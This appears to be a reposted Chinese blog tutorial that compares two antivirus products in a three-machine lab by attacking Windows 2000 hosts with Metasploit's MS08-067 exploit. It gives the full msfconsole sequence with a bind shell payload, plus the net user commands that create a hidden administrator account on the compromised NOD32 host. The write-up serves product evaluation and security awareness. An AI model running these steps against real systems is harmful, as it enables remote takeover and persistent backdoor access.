前言

媒體上關于系統漏洞的話題一直不斷，在我所接觸的用一些朋友和用戶中雖然也知道打系統補丁很重要，但卻又一直不以為然總以為網絡上的危險離自己很遠，大部份人都認為進行一次遠程攻擊很困難甚至認為只要安裝了防病毒軟件就一切大吉，是不是這樣呢？讓我們看看今天的操作。

主動防御技術通過微點推出后給現在的安全界注入了一針興奮劑，現在各大廠商都宣傳自己有了主動防御技術，而網絡上針對它的宣傳也是毀譽參半。 一切都以事實為主，有圖有真相。

測試環境

Metasploit

操作系統：CentOS5

軟件版本：framework-3.5.0-linux-i686.run

IP　地址：192.168.0.10

Metasploit(http://www.metasploit.com/framework/download/)是一款開源的安全漏洞檢測工具。由于Metasploit是免費的工具，因此安全工作人員常用Metasploit工具來檢測系統的安全性。Metasploit Framework (MSF)是2003 年以開放源代碼方式發布、可自由獲取的開發框架，這個環境為滲透測試、shellcode 編寫和漏洞研究提供了一個可靠的平臺。它集成了各平臺上常見的溢出漏洞和流行的shellcode，并且不斷更新，最新版本的MSF 包含了180多種當前流行的操作系統和應用軟件的exploit，以及100多 個shellcode。作為安全工具，它在安全檢測中起到不容忽視的作用，并為漏洞自動化探測和及時檢測系統漏洞提供有力的保障。

微點主動防御軟件

操作系統：Windows 2000 SP2

微點版本：2010-12-09

IP　地址：192.168.0.200

NOD32環境

操作系統：Windows 2000 SP2

軟件版本：2010-12-09

IP　地址：192.168.0.100

操作步驟

搭建測試環境

按簡介中的說明搭建相應的測試環境，保證三臺機器都能相互通訊，有關實驗環境的搭建方法可以參考利用單主機搭建和物理機器通訊的測試網絡這篇文章。有關Metaspolit的安裝方法網絡上有很多，其方法也不復雜。

查看本地用戶

在安裝了微點主動防御軟件的計算機上打開“用戶管理”查看本地的所有用戶。

對微點進行溢出攻擊

登錄到安裝了Metasploit的系統，同時運行以下的命令啟動到Metasploit程序，同時設定調用的溢出漏洞為MS08-067，遠程主機為192.168.0.200，本地聯接端口為5555，如下圖所示。

msfconsole

use?exploit/windows/smb/ms08_067_netapi

setPAYLOAD?windows/shell/bind_tcp

setRHOST?192.168.0.200

setLPORT?5555

exploit

查看攻擊結果(微點)

輸入上述指令后，本地Metasploit會提示溢出結束但未能取得會話權限，而此時微點已檢測到溢出攻擊，同時還給出了遠程攻擊者的IP地址，證明安裝微點主動防御軟件后能有效防止溢出攻擊。具體如下圖所示。

對NOD32進行溢出攻擊

登入Metasploit重新設定遠程攻擊的主機地址，因開始已指定了具體的溢出漏洞，這里只需要重新設定遠程主機地址就可以了。具體指令及截圖如下所示。

unset?RHOST

setRHOST?192.168.0.100

show?options

exploit

查看攻擊結果(NOD32)

在輸入上述指令后會提示已獲取遠程主機的管理權限，此時在遠程管理會話中輸入相關指令在計算機中新增用戶并賦予其管理員權限，具體指令及截圖如下所示。

netusertest?123?/add

net?localgroup?administrators?test?/add

測試遠程添加的用戶

為了檢測溢出攻擊的作用，打開“用戶管理”界面時會發現已新增test用戶，同時可以使用該用戶登陸系統且擁有管理員權限，如下圖所示。

后記

從上面的測試可以得知微點所宣傳的防止溢出(漏洞)攻擊確實是有效的。以下是關于該功能的描述。

“本發明涉及計算機緩沖區溢出攻擊的檢測方法，即，通過建立勾掛函數，檢查線程所建立的堆棧幀的返回地址，并根據該返回地址判斷是否發生緩沖區溢出，并在發現緩沖區溢出后，將引起該緩沖區溢出的線程結束。利用本發明的緩沖區溢出攻擊的檢測方法，不但可以高效、準確的檢查出惡意程序的緩沖區溢出攻擊，而且避免了現有技術中的殺毒軟件對新生病毒特征代碼獲取的滯后性，和防火墻系統使用時的繁瑣以及給計算機知識很少的用戶帶來的麻煩。即使對于新生的緩沖區溢出攻擊的病毒、木馬也可以準確、高效的進行攔截?！?/p>

“申請(專利)號：200510007681.5”

聲明

本文的目的絕不是為那些懷有不良動機的人提供支持，也不承擔因為技術被濫用所產生的連帶責任；本文的目的在到最在限度地喚起大家的網絡安全意識，正視我們的網絡世界所面臨的一聲危機，并采取行動。

總結

以上是生活随笔為你收集整理的html溢出攻击,溢出（漏洞）攻击的实现及防御的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。